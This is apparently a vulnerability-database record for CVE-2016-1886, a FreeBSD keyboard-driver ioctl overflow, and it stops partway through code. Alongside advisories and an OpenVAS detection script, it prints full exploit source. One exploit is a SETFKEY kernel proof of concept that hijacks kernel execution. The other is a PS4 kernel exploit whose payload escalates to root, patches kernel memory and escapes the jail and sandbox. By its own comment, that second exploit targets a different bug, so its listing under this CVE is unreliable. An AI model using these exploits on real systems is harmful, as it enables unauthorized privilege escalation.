ID CVE-2016-1886 Type cve Reporter cve@mitre.org Modified 2017-04-20T01:59:00
Description
Integer signedness error in the genkbd_commonioctl function in sys/dev/kbd/kbd.c in FreeBSD 9.3 before p42, 10.1 before p34, 10.2 before p17, and 10.3 before p3 allows local users to obtain sensitive information from kernel memory, cause a denial of service (memory overwrite and kernel crash), or gain privileges via a negative value in the flen structure member of the arg argument to a SETFKEY ioctl call, which triggers a "two-way heap and stack overflow".
{"id": "CVE-2016-1886", "bulletinFamily": "NVD", "title": "CVE-2016-1886", "description": "Integer signedness error in the genkbd_commonioctl function in sys/dev/kbd/kbd.c in FreeBSD 9.3 before p42, 10.1 before p34, 10.2 before p17, and 10.3 before p3 allows local users to obtain sensitive information from kernel memory, cause a denial of service (memory overwrite and kernel crash), or gain privileges via a negative value in the flen structure member in the arg argument in a SETFKEY ioctl call, which triggers a \"two way heap and stack overflow.\"", "published": "2016-05-25T15:59:00", "modified": "2017-04-20T01:59:00", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-1886", "reporter": "cve@mitre.org", "references": ["https://security.FreeBSD.org/patches/SA-16:18/atkbd.patch", "http://cturt.github.io/SETFKEY.html", "https://www.freebsd.org/security/advisories/FreeBSD-SA-16:18.atkbd.asc", "http://www.securityfocus.com/bid/90734", "http://www.securitytracker.com/id/1035905"], "cvelist": ["CVE-2016-1886"], "type": "cve", "lastseen": "2020-10-03T12:10:42", "edition": 3, "viewCount": 6, "enchantments": {"dependencies": {"references": [{"type": "f5", "idList": ["SOL00246015", "F5:K00246015"]}, {"type": "exploitdb", "idList": ["EDB-ID:44211"]}, {"type": "freebsd", "idList": ["7BBC0E8C-600A-11E6-A6C3-14DAE9D210B8"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310106750"]}, {"type": "zdt", "idList": ["1337DAY-ID-29915"]}, {"type": "nessus", "idList": ["PFSENSE_SA-16_04.NASL", "FREEBSD_PKG_7BBC0E8C600A11E6A6C314DAE9D210B8.NASL"]}], "modified": "2020-10-03T12:10:42", "rev": 2}, "score": {"value": 6.3, "vector": "NONE", "modified": "2020-10-03T12:10:42", "rev": 2}, "vulnersScore": 6.3}, "cpe": ["cpe:/o:freebsd:freebsd:9.3", "cpe:/o:freebsd:freebsd:10.3", "cpe:/o:freebsd:freebsd:10.2", "cpe:/o:freebsd:freebsd:10.1"], "affectedSoftware": [{"cpeName": "freebsd:freebsd", "name": "freebsd", 
"operator": "eq", "version": "9.3"}, {"cpeName": "freebsd:freebsd", "name": "freebsd", "operator": "eq", "version": "10.2"}, {"cpeName": "freebsd:freebsd", "name": "freebsd", "operator": "eq", "version": "10.1"}, {"cpeName": "freebsd:freebsd", "name": "freebsd", "operator": "eq", "version": "10.3"}], "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 7.2, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 3.9, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "cpe23": ["cpe:2.3:o:freebsd:freebsd:9.3:*:*:*:*:*:*:*", "cpe:2.3:o:freebsd:freebsd:10.1:*:*:*:*:*:*:*", "cpe:2.3:o:freebsd:freebsd:10.3:*:*:*:*:*:*:*", "cpe:2.3:o:freebsd:freebsd:10.2:*:*:*:*:*:*:*"], "cwe": ["CWE-119"], "scheme": null, "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:o:freebsd:freebsd:10.1:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:freebsd:freebsd:9.3:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:freebsd:freebsd:10.3:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:freebsd:freebsd:10.2:*:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}]}}
{"f5": [{"lastseen": "2017-06-08T00:16:38", "bulletinFamily": "software", "cvelist": ["CVE-2016-1886"], "edition": 1, "description": "\nF5 Product Development has evaluated the currently supported releases for potential vulnerability.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Severity| Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM| None| 12.0.0 - 12.1.0 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP AAM| None| 12.0.0 - 12.1.0 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP AFM| None| 12.0.0 - 12.1.0 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP Analytics| None| 12.0.0 - 12.1.0 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP APM| None| 12.0.0 - 12.1.0 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP ASM| None| 12.0.0 - 12.1.0 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP DNS| None| 12.0.0 - 12.1.0| Not vulnerable| None \nBIG-IP Edge Gateway| None| 11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP GTM| None| 11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP Link Controller| None| 12.0.0 - 12.1.0 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP PEM| None| 12.0.0 - 12.1.0 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP PSM| None| 11.4.0 - 11.4.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP WebAccelerator| None| 11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP WOM| None| 11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nARX| None| 6.2.0 - 6.4.0| Not vulnerable| None \nEnterprise Manager| None| 3.1.1| Not vulnerable| None \nFirePass| None| 7.0.0| Not vulnerable| None \nBIG-IQ Cloud| None| 4.0.0 - 4.5.0| Not 
vulnerable| None \nBIG-IQ Device| None| 4.2.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Security| None| 4.0.0 - 4.5.0| Not vulnerable| None \nBIG-IQ ADC| None| 4.5.0| Not vulnerable| None \nBIG-IQ Centralized Management| None| 4.6.0| Not vulnerable| None \nBIG-IQ Cloud and Orchestration| None| 1.0.0| Not vulnerable| None \nLineRate| None| 2.5.0 - 2.6.1| Not vulnerable| None \nF5 MobileSafe| None| 1.0.0| Not vulnerable| None \nF5 WebSafe| None| 1.0.0| Not vulnerable| None \nTraffix SDC| None| 5.0.0 \n4.0.0 - 4.4.0| Not vulnerable| None\n\nNone\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n", "modified": "2016-06-11T03:09:00", "published": "2016-06-11T03:09:00", "href": "https://support.f5.com/csp/article/K00246015", "id": "F5:K00246015", "title": "FreeBSD vulnerability CVE-2016-1886", "type": "f5", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-26T17:23:31", "bulletinFamily": "software", "cvelist": ["CVE-2016-1886"], "edition": 1, "description": "Vulnerability Recommended Actions\n\nNone\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical issue hotfix policy\n", "modified": "2016-06-10T00:00:00", "published": "2016-06-10T00:00:00", "id": "SOL00246015", "href": "http://support.f5.com/kb/en-us/solutions/public/k/00/sol00246015.html", "type": "f5", "title": "SOL00246015 - 
FreeBSD vulnerability CVE-2016-1886", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2018-02-28T15:20:58", "description": "FreeBSD Kernel (FreeBSD 10.2 < 10.3 x64) - 'SETFKEY' (PoC). CVE-2016-1886. Dos exploit for FreeBSD_x86-64 platform", "published": "2016-05-29T00:00:00", "type": "exploitdb", "title": "FreeBSD Kernel (FreeBSD 10.2 < 10.3 x64) - 'SETFKEY' (PoC)", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-1886"], "modified": "2016-05-29T00:00:00", "id": "EDB-ID:44211", "href": "https://www.exploit-db.com/exploits/44211/", "sourceData": "#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <stddef.h>\r\n#include <string.h>\r\n#include <errno.h>\r\n#include <unistd.h>\r\n#include <sys/ioctl.h>\r\n#include <sys/kbio.h>\r\n#include <sys/types.h>\r\n#include <sys/mman.h>\r\n#include <sys/param.h>\r\n#include <sys/linker.h>\r\n\r\nint (*kprintf)(const char *fmt, ...);\r\nchar *ostype;\r\n\r\nuint64_t originalRip;\r\nuint64_t originalRbp;\r\n\r\nvoid *resolve(char *name) {\r\n\tstruct kld_sym_lookup ksym;\r\n\t\r\n\tksym.version = sizeof(ksym);\r\n\tksym.symname = name;\r\n\t\r\n\tif(kldsym(0, KLDSYM_LOOKUP, &ksym) < 0) {\r\n\t\tperror(\"kldsym\");\r\n\t\texit(1);\r\n\t}\r\n\t\r\n\tprintf(\" [+] Resolved %s to %#lx\\n\", ksym.symname, ksym.symvalue);\r\n\treturn (void *)ksym.symvalue;\r\n}\r\n\r\nvoid payload(void) {\r\n\tkprintf(\" [+] Entered kernel payload\\n\");\r\n\t\r\n\tstrcpy(ostype, \"CTurt \");\r\n\t\r\n\t__asm__ volatile(\"swapgs; sysret\");\r\n}\r\n\r\n// Copy the stack onto the heap\r\nvoid heapOverflow(int index, size_t size) {\r\n\tfkeyarg_t fkey;\r\n\t\r\n\tfkey.keynum = index;\r\n\tfkey.flen = size;\r\n\tmemset(&fkey.keydef, 0, 16);\r\n\t\r\n\tioctl(0, SETFKEY, &fkey);\r\n}\r\n\r\n// Copy the heap onto the stack\r\nvoid stackOverflow(int index) {\r\n\tfkeyarg_t fkey;\r\n\t\r\n\tfkey.keynum = index;\r\n\tfkey.flen = 16;\r\n\tmemset(&fkey.keydef, 0, 
16);\r\n\t\r\n\tioctl(0, GETFKEY, &fkey);\r\n}\r\n\r\nint main(void) {\r\n\tint result, i;\r\n\tfkeyarg_t fkey;\r\n\t\r\n\tuint32_t ripLower4 = 0x808312cd; // jmp rbp\r\n\tuint64_t rbp = (uint64_t)payload;\r\n\t\r\n\t\r\n\tkprintf = resolve(\"printf\");\r\n\tostype = resolve(\"ostype\");\r\n\t\r\n\t\r\n\tprintf(\" [+] Set full length for key 10\\n\");\r\n\tfkey.keynum = 10;\r\n\tfkey.flen = 16;\r\n\tioctl(0, SETFKEY, &fkey);\r\n\t\r\n\t\r\n\tprintf(\" [+] Set bad length and perform heap overflow\\n\");\r\n\theapOverflow(0, 128 - offsetof(fkeyarg_t, keydef) + 8 + 0x30 + sizeof(ripLower4));\r\n\t\r\n\t\r\n\tprintf(\" [+] Prepare stack overflow memory\\n\");\r\n\tfkey.keynum = 10;\r\n\tfkey.flen = 16;\r\n\tioctl(0, GETFKEY, &fkey);\r\n\toriginalRbp = *(uint64_t *)((char *)&fkey.keydef + 4);\r\n\toriginalRip = 0xffffffff00000000 | *(uint32_t *)((char *)&fkey.keydef + 12);\r\n\t\r\n\tprintf(\" [+] Original rip: %#lx\\n\", originalRip);\r\n\tprintf(\" [+] Original rbp: %#lx\\n\", originalRbp);\r\n\t\r\n\t*(uint64_t *)((char *)&fkey.keydef + 4) = rbp;\r\n\t*(uint32_t *)((char *)&fkey.keydef + 12) = ripLower4;\r\n\tioctl(0, SETFKEY, &fkey);\r\n\t\r\n\t\r\n\tprintf(\" [+] Trigger stack overflow\\n\");\r\n\tfflush(stdout);\r\n\t\r\n\tstackOverflow(0);\r\n\t\r\n\t\r\n\treturn 0;\r\n}", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/44211/"}], "openvas": [{"lastseen": "2019-05-29T18:34:01", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-1886"], "description": "Junos OS is prone to a buffer overflow vulnerability in the keyboard\ndriver.", "modified": "2018-10-26T00:00:00", "published": "2017-04-13T00:00:00", "id": "OPENVAS:1361412562310106750", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310106750", "type": "openvas", "title": "Junos Buffer Overflow Vulnerability", "sourceData": "###############################################################################\n# 
OpenVAS Vulnerability Test\n# $Id: gb_junos_jsa10784.nasl 12106 2018-10-26 06:33:36Z cfischer $\n#\n# Junos Buffer Overflow Vulnerability\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = 'cpe:/o:juniper:junos';\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.106750\");\n script_version(\"$Revision: 12106 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 08:33:36 +0200 (Fri, 26 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-04-13 08:24:49 +0200 (Thu, 13 Apr 2017)\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_cve_id(\"CVE-2016-1886\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Junos Buffer Overflow Vulnerability\");\n\n script_category(ACT_GATHER_INFO);\n\n script_family(\"JunOS Local Security Checks\");\n script_copyright(\"This script is Copyright (C) 2017 Greenbone Networks GmbH\");\n script_dependencies(\"gb_ssh_junos_get_version.nasl\", 
\"gb_junos_snmp_version.nasl\");\n script_mandatory_keys(\"Junos/Version\");\n\n script_tag(name:\"summary\", value:\"Junos OS is prone to a buffer overflow vulnerability in the keyboard\ndriver.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable OS build is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Incorrect signedness comparison in the ioctl handler allows a malicious\nlocal user to overwrite a portion of the kernel memory. A local user may crash the kernel, read a portion of\nkernel memory and execute arbitrary code in kernel context.\");\n\n script_tag(name:\"impact\", value:\"A local attacker may escalate privileges by executing arbitrary code.\");\n\n script_tag(name:\"affected\", value:\"Junos OS 12.3X48, 14.1, 14.2, 15.1 and 16.1.\");\n\n script_tag(name:\"solution\", value:\"New builds of Junos OS software are available from Juniper.\");\n\n script_xref(name:\"URL\", value:\"http://kb.juniper.net/JSA10784\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"revisions-lib.inc\");\ninclude(\"version_func.inc\");\n\nif (!version = get_app_version(cpe: CPE, nofork: TRUE))\n exit(0);\n\nif (version =~ \"^12\") {\n if ((revcomp(a: version, b: \"12.3X48-D55\") < 0) &&\n (revcomp(a: version, b: \"12.3X48\") >= 0)) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"12.3X48-D55\");\n security_message(port: 0, data: report);\n exit(0);\n }\n}\n\nif (version =~ \"^14\") {\n if (revcomp(a: version, b: \"14.1R9\") < 0) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"14.1R9\");\n security_message(port: 0, data: report);\n exit(0);\n }\n else if ((revcomp(a: version, b: \"14.1X53-D50\") < 0) &&\n (revcomp(a: version, b: \"14.1X53\") >= 0)) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"14.1X53-D50\");\n security_message(port: 0, data: report);\n exit(0);\n }\n else if ((revcomp(a: version, b: \"14.2R7\") < 0) &&\n (revcomp(a: 
version, b: \"14.2\") >= 0)) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"14.2R7\");\n security_message(port: 0, data: report);\n exit(0);\n }\n}\n\nif (version =~ \"^15\") {\n if ((revcomp(a: version, b: \"15.1F5-S5\") < 0) &&\n (revcomp(a: version, b: \"15.1F\") >= 0)) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"15.1F5-S5\");\n security_message(port: 0, data: report);\n exit(0);\n }\n else if ((revcomp(a: version, b: \"15.1R5\") < 0) &&\n (revcomp(a: version, b: \"15.1R\") >= 0)) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"15.1R5\");\n security_message(port: 0, data: report);\n exit(0);\n }\n else if ((revcomp(a: version, b: \"15.1X49-D60\") < 0) &&\n (revcomp(a: version, b: \"15.1X49\") >= 0)) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"15.1X49-D60\");\n security_message(port: 0, data: report);\n exit(0);\n }\n else if ((revcomp(a: version, b: \"15.1X53-D230\") < 0) &&\n (revcomp(a: version, b: \"15.1X53\") >= 0)) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"15.1X53-D230\");\n security_message(port: 0, data: report);\n exit(0);\n }\n}\n\nif (version =~ \"^16\") {\n if (revcomp(a: version, b: \"16.1R2\") < 0) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"16.1R2\");\n security_message(port: 0, data: report);\n exit(0);\n }\n}\n\nexit(99);\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "freebsd": [{"lastseen": "2019-05-29T18:32:33", "bulletinFamily": "unix", "cvelist": ["CVE-2016-1886"], "description": "\nProblem Description:\nIncorrect signedness comparison in the ioctl(2) handler\n\tallows a malicious local user to overwrite a portion of the\n\tkernel memory.\nImpact:\nA local user may crash the kernel, read a portion of\n\tkernel memory and execute arbitrary code in kernel context.\n\tThe result of executing an arbitrary kernel code is 
privilege\n\tescalation.\n", "edition": 4, "modified": "2016-05-17T00:00:00", "published": "2016-05-17T00:00:00", "id": "7BBC0E8C-600A-11E6-A6C3-14DAE9D210B8", "href": "https://vuxml.freebsd.org/freebsd/7bbc0e8c-600a-11e6-a6c3-14dae9d210b8.html", "title": "FreeBSD -- Buffer overflow in keyboard driver", "type": "freebsd", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2018-04-03T00:18:07", "description": "Exploit for freebsd platform in category dos / poc", "edition": 1, "published": "2018-03-01T00:00:00", "type": "zdt", "title": "FreeBSD Kernel (FreeBSD 10.2 < 10.3 x64) - SETFKEY (PoC) Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-1886"], "modified": "2018-03-01T00:00:00", "href": "https://0day.today/exploit/description/29915", "id": "1337DAY-ID-29915", "sourceData": "/*\r\n Code written based on info available here http://cturt.github.io/dlclose-overflow.html\r\n \r\n See attached LICENCE file\r\n Thanks to CTurt and qwertyoruiop\r\n \r\n - @kr105rlz\r\n \r\nDownload: //github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44206.zip\r\n*/\r\n \r\n#include \"ps4.h\"\r\n \r\n#define DEBUG_SOCKET\r\n#include \"defines.h\"\r\n \r\nstatic int sock;\r\nstatic void *dump;\r\n \r\nvoid payload(struct knote *kn) {\r\n struct thread *td;\r\n struct ucred *cred;\r\n \r\n // Get td pointer\r\n asm volatile(\"mov %0, %%gs:0\" : \"=r\"(td));\r\n \r\n // Enable UART output\r\n uint16_t *securityflags = (uint16_t*)0xFFFFFFFF833242F6;\r\n *securityflags = *securityflags & ~(1 << 15); // bootparam_disable_console_output = 0\r\n \r\n // Print test message to the UART line\r\n printfkernel(\"\\n\\n\\n\\n\\n\\n\\n\\n\\nHello from kernel :-)\\n\\n\\n\\n\\n\\n\\n\\n\\n\");\r\n \r\n // Disable write protection\r\n uint64_t cr0 = readCr0();\r\n writeCr0(cr0 & ~X86_CR0_WP);\r\n \r\n // sysctl_machdep_rcmgr_debug_menu and sysctl_machdep_rcmgr_store_moe\r\n *(uint16_t *)0xFFFFFFFF82607C46 = 0x9090;\r\n 
*(uint16_t *)0xFFFFFFFF82607826 = 0x9090;\r\n \r\n *(char *)0xFFFFFFFF8332431A = 1;\r\n *(char *)0xFFFFFFFF83324338 = 1;\r\n \r\n // Restore write protection\r\n writeCr0(cr0);\r\n \r\n // Resolve creds\r\n cred = td->td_proc->p_ucred;\r\n \r\n // Escalate process to root\r\n cred->cr_uid = 0;\r\n cred->cr_ruid = 0;\r\n cred->cr_rgid = 0;\r\n cred->cr_groups[0] = 0;\r\n \r\n void *td_ucred = *(void **)(((char *)td) + 304); // p_ucred == td_ucred\r\n \r\n // sceSblACMgrIsSystemUcred\r\n uint64_t *sonyCred = (uint64_t *)(((char *)td_ucred) + 96);\r\n *sonyCred = 0xffffffffffffffff;\r\n \r\n // sceSblACMgrGetDeviceAccessType\r\n uint64_t *sceProcType = (uint64_t *)(((char *)td_ucred) + 88);\r\n *sceProcType = 0x3801000000000013; // Max access\r\n \r\n // sceSblACMgrHasSceProcessCapability\r\n uint64_t *sceProcCap = (uint64_t *)(((char *)td_ucred) + 104);\r\n *sceProcCap = 0xffffffffffffffff; // Sce Process\r\n \r\n ((uint64_t *)0xFFFFFFFF832CC2E8)[0] = 0x123456; //priv_check_cred bypass with suser_enabled=true\r\n ((uint64_t *)0xFFFFFFFF8323DA18)[0] = 0; // bypass priv_check\r\n \r\n // Jailbreak ;)\r\n cred->cr_prison = (void *)0xFFFFFFFF83237250; //&prison0\r\n \r\n // Break out of the sandbox\r\n void *td_fdp = *(void **)(((char *)td->td_proc) + 72);\r\n uint64_t *td_fdp_fd_rdir = (uint64_t *)(((char *)td_fdp) + 24);\r\n uint64_t *td_fdp_fd_jdir = (uint64_t *)(((char *)td_fdp) + 32);\r\n uint64_t *rootvnode = (uint64_t *)0xFFFFFFFF832EF920;\r\n *td_fdp_fd_rdir = *rootvnode;\r\n *td_fdp_fd_jdir = *rootvnode;\r\n}\r\n \r\n// Perform kernel allocation aligned to 0x800 bytes\r\nint kernelAllocation(size_t size, int fd) {\r\n SceKernelEqueue queue = 0;\r\n sceKernelCreateEqueue(&queue, \"kexec\");\r\n \r\n sceKernelAddReadEvent(queue, fd, 0, NULL);\r\n \r\n return queue;\r\n}\r\n \r\nvoid kernelFree(int allocation) {\r\n close(allocation);\r\n}\r\n \r\nvoid *exploitThread(void *none) {\r\n printfsocket(\"[+] Entered exploitThread\\n\");\r\n \r\n uint64_t bufferSize = 
0x8000;\r\n uint64_t overflowSize = 0x8000;\r\n uint64_t copySize = bufferSize + overflowSize;\r\n \r\n // Round up to nearest multiple of PAGE_SIZE\r\n uint64_t mappingSize = (copySize + PAGE_SIZE - 1) & ~(PAGE_SIZE - 1);\r\n \r\n uint8_t *mapping = mmap(NULL, mappingSize + PAGE_SIZE, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);\r\n munmap(mapping + mappingSize, PAGE_SIZE);\r\n \r\n uint8_t *buffer = mapping + mappingSize - copySize;\r\n \r\n int64_t count = (0x100000000 + bufferSize) / 4;\r\n \r\n // Create structures\r\n struct knote kn;\r\n struct filterops fo;\r\n struct knote **overflow = (struct knote **)(buffer + bufferSize);\r\n overflow[2] = &kn;\r\n kn.kn_fop = &fo;\r\n \r\n // Setup trampoline to gracefully return to the calling thread\r\n void *trampw = NULL;\r\n void *trampe = NULL;\r\n int executableHandle;\r\n int writableHandle;\r\n uint8_t trampolinecode[] = {\r\n 0x58, // pop rax\r\n 0x48, 0xB8, 0x19, 0x39, 0x40, 0x82, 0xFF, 0xFF, 0xFF, 0xFF, // movabs rax, 0xffffffff82403919\r\n 0x50, // push rax\r\n 0x48, 0xB8, 0xBE, 0xBA, 0xAD, 0xDE, 0xDE, 0xC0, 0xAD, 0xDE, // movabs rax, 0xdeadc0dedeadbabe\r\n 0xFF, 0xE0 // jmp rax\r\n };\r\n \r\n // Get Jit memory\r\n sceKernelJitCreateSharedMemory(0, PAGE_SIZE, PROT_CPU_READ | PROT_CPU_WRITE | PROT_CPU_EXEC, &executableHandle);\r\n sceKernelJitCreateAliasOfSharedMemory(executableHandle, PROT_CPU_READ | PROT_CPU_WRITE, &writableHandle);\r\n \r\n // Map r+w & r+e\r\n trampe = mmap(NULL, PAGE_SIZE, PROT_READ | PROT_EXEC, MAP_SHARED, executableHandle, 0);\r\n trampw = mmap(NULL, PAGE_SIZE, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_TYPE, writableHandle, 0);\r\n \r\n // Copy trampoline to allocated address\r\n memcpy(trampw, trampolinecode, sizeof(trampolinecode)); \r\n *(void **)(trampw + 14) = (void *)payload;\r\n \r\n // Call trampoline when overflown\r\n fo.f_detach = trampe;\r\n \r\n // Start the exploit\r\n int sockets[0x2000];\r\n int allocation[50], m = 0, m2 = 0;\r\n int fd = (bufferSize 
- 0x800) / 8;\r\n \r\n printfsocket(\"[+] Creating %d sockets\\n\", fd);\r\n \r\n // Create sockets\r\n for(int i = 0; i < 0x2000; i++) {\r\n sockets[i] = sceNetSocket(\"sss\", AF_INET, SOCK_STREAM, 0);\r\n if(sockets[i] >= fd) {\r\n sockets[i + 1] = -1;\r\n break;\r\n }\r\n }\r\n \r\n // Spray the heap\r\n for(int i = 0; i < 50; i++) {\r\n allocation[i] = kernelAllocation(bufferSize, fd);\r\n printfsocket(\"[+] allocation = %llp\\n\", allocation[i]);\r\n }\r\n \r\n // Create hole for the system call's allocation\r\n m = kernelAllocation(bufferSize, fd);\r\n m2 = kernelAllocation(bufferSize, fd);\r\n kernelFree(m);\r\n \r\n // Perform the overflow\r\n int result = syscall(597, 1, mapping, &count);\r\n printfsocket(\"[+] Result: %d\\n\", result);\r\n \r\n // Execute the payload\r\n printfsocket(\"[+] Freeing m2\\n\");\r\n kernelFree(m2);\r\n \r\n // Close sockets\r\n for(int i = 0; i < 0x2000; i++) {\r\n if(sockets[i] == -1)\r\n break;\r\n sceNetSocketClose(sockets[i]);\r\n }\r\n \r\n // Free allocations\r\n for(int i = 0; i < 50; i++) {\r\n kernelFree(allocation[i]);\r\n }\r\n \r\n // Free the mapping\r\n munmap(mapping, mappingSize);\r\n \r\n return NULL;\r\n}\r\n \r\nint _main(void) {\r\n ScePthread thread;\r\n \r\n initKernel(); \r\n initLibc();\r\n initNetwork();\r\n initJIT();\r\n initPthread();\r\n \r\n#ifdef DEBUG_SOCKET\r\n struct sockaddr_in server;\r\n \r\n server.sin_len = sizeof(server);\r\n server.sin_family = AF_INET;\r\n server.sin_addr.s_addr = IP(192, 168, 0, 4);\r\n server.sin_port = sceNetHtons(9023);\r\n memset(server.sin_zero, 0, sizeof(server.sin_zero));\r\n sock = sceNetSocket(\"debug\", AF_INET, SOCK_STREAM, 0);\r\n sceNetConnect(sock, (struct sockaddr *)&server, sizeof(server));\r\n \r\n int flag = 1;\r\n sceNetSetsockopt(sock, IPPROTO_TCP, TCP_NODELAY, (char *)&flag, sizeof(int));\r\n \r\n dump = mmap(NULL, PAGE_SIZE, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);\r\n#endif\r\n \r\n printfsocket(\"[+] Starting...\\n\");\r\n 
